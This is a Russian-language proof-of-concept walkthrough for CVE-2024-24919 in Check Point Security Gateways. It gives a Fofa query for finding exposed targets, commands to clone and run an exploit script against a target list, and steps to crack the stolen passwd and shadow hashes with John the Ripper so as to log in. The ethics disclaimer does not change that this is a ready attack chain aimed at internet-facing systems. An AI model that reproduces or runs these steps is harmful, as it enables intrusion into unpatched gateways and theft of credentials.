
POC - CVE-2024–24919 - Check Point Security Gateways
Потенциально позволяет злоумышленнику читать определённую информацию на Check Point Security Gateways, если они подключены к интернету и на них включены Remote Access VPN или Mobile Access Software Blades. Исправление безопасности, устраняющее эту уязвимость, доступно.
Читать об этом — CVE-2024-24919
Дисклеймер: Этот Proof of Concept (POC) создан только для образовательных и этических целей тестирования. Использование этого инструмента для атаки на цели без предварительного взаимного согласия незаконно. Ответственность за соблюдение всех применимых местных, государственных и федеральных законов лежит на конечном пользователе. Разработчики не несут ответственности и не отвечают за любое неправильное использование или ущерб, причинённый этой программой.
Чтобы найти потенциальные цели, используйте Fofa (аналогично Shodan.io):
app="Check_Point-SSL-Network-Extender"
Во-первых, склонируйте репозиторий:
git clone https://github.com/verylazytech/CVE-2024-24919
Затем выберите свою цель и добавьте её в файл list.txt в следующем формате:
Запустите эксплойт:
python3 CVE-2024-24919.py -l list.txt
Теперь есть 2 варианта результата:
Неуспешный:

Успешный:

Теперь, когда вы нашли оба файла passwd и shadow, вы можете попробовать взломать хэш с помощью JohnTheRipper. После запуска эксплойта у вас есть 2 файла — passwd и shadow — поэтому вы можете объединить их в один файл и попробовать взломать их (я использовал rockyou.txt, но это может быть любой словарь паролей):
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

И теперь, после того как мы взломали хэш, мы можем войти под пользователем!